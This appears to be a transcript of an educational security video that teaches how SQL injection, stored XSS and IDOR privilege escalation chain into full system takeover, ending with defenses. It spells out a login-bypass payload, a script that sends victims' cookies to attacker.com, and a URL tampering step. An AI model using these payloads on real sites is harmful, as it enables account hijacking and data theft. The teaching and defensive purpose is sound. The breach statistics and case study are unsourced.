Welcome to Bug Bounty and Beyond, your modern application security blueprint. This is episode 1 of our Vulnerability Chaining Masterclass. Today we'll walk through how SQL Injection, Stored XSS, and Privilege Escalation can be chained together to completely take over a system. One chain to own it all. Here's our roadmap for the session. We'll begin with the theory behind chaining, then deep dive into SQL Injection, Stored XSS, and Privilege Escalation. After that, I'll connect them together into one powerful chain, show you a real-world case study, and finally, discuss how to break these chains with proper defenses. Most real-world breaches don't happen because of just one bug. They happen because attackers chain multiple smaller issues into something devastating. In fact, 89% of critical breaches involve chaining. Financial damage is 3.5 times higher when vulnerabilities are exploited in sequence, and advanced threat groups rely on chaining as a core technique. For bug bounty hunters, these chains can also mean premium payouts. Remember, attackers think in chains, not silos. So what exactly is vulnerability chaining? Think of it as breaking through multiple locked doors one after another. First, you get initial access, maybe through SQL injection. Then you expand persistence, for example with Stored XSS. Finally, you escalate privileges, often by exploiting an insecure direct object reference vulnerability. Put together, that sequence leads to full system takeover. Let's start with SQL injection. This vulnerability allows an attacker to manipulate database queries using malicious input. For example, instead of providing a username and password, an attacker can use a payload like admin quote --, which tricks the system into ignoring the password check completely. And just like that, the attacker is in as an administrator. SQL injection commonly appears in login forms, URL parameters, and even HTTP headers like cookies or referrers. The impact ranges from data exposure to full authentication bypass, and in advanced cases, even remote code execution. Notice here how the injected query uses comment syntax to skip password validation. A simple trick that turns authentication into a security hole. Here's how it looks in practice. On the left, normal login fails without the correct password. On the right, with the payload admin quote --, the attacker bypasses authentication entirely and gains admin access. Now, while SQL injection has caused countless real-world breaches, the famous 2019 Capital One case wasn't SQLI. It was a misconfigured firewall and SSRF that exposed over 100 million customer records. The key lesson is this. Whether it's SQL injection, SSRF, or another flaw, attackers exploit weaknesses in sequence, and the result can be catastrophic. Next, stored cross-site scripting or stored XSS. Unlike reflected XSS, this is persistent. Malicious code is stored in the database, for example, in a product review or comment field, and every time a victim loads the page, their browser executes that code. The risk? It impacts every single visitor until it's removed. Take this example payload. Open script tag. Inside, create a new variable called img and assign it to a new image. Next line, set img.source equal to https://attacker.com/steal?c equals plus document.cookie. Close the script tag. Simple but effective. The attacker injects it into a comment box. It's stored in the database, served back to every user, and when the page loads, their cookies are silently exfiltrated to the attacker. That's persistence in action. The flow looks like this. Attacker injects the script, it's stored in the database, the victim views the page, and the attacker receives stolen session data. Even a basic cookie stealer is enough to hijack sessions and impersonate victims. For chaining, this persistence is critical because it lets attackers maintain access until they can move to the next step. Stored XSS can be taken much further. For instance, attackers can manipulate the DOM to expose hidden admin panels, or they can implement keyloggers to capture everything typed in the browser. The business impact? On average, XSS breaches cost $3.9 million, with 60% of companies reporting serious trust issues afterward. It's also perfect for chaining because it gives attackers a stable beachhead for privilege escalation. Now let's talk about privilege escalation. This is where attackers take an account they've compromised and climb the ladder of access. Vertical escalation means going from a user to an admin and maybe even to super admin. Horizontal escalation means accessing another user's data or account at the same level. One of the most common privilege escalation vectors is insecure direct object reference. Imagine a normal user profile with the URL profile?user_id equals 1337. If the attacker changes it to profile?user_id equals admin_001 and the system doesn't enforce proper authorization, suddenly they are inside the admin's account. That's a full privilege escalation. Now let's link it all together. Step 1. SQL injection to bypass login and access the database. Step 2. Stored XSS injection to steal admin cookies and hijack sessions. Step 3. Privilege escalation through insecure direct object reference using that stolen session to become super admin. The result? Full system compromise. From a single login form to complete takeover. One chain to own it all. This isn't hypothetical. An e-commerce platform suffered exactly this chain. An SQL injection in a product search form gave attackers database access. They used that to plant stored XSS in product reviews. When admins viewed the dashboard, the payload stole their sessions, and attackers escalated privileges to full admin. The impact: $2.3 million stolen in fraudulent transactions, $5.8 million in regulatory fines, and a 28% customer trust decline. Total damage: over $8 million plus long-term brand harm. So how do we defend against chains like this? By breaking the links. Parameterized queries stop SQL injection. Output encoding in CSP reduce XSS. Strong access controls prevent privilege escalation. And layered defenses like WAFs, RASP, and network segmentation catch what slips through. The key takeaway: think in chains, not in silos. Break the chain early and the attack collapses. In the next episode, we'll explore cloud-focused chaining, SSRF, metadata access, and IAM key abuse. Make sure to subscribe so you don't miss it. Thanks for watching. Stay secure.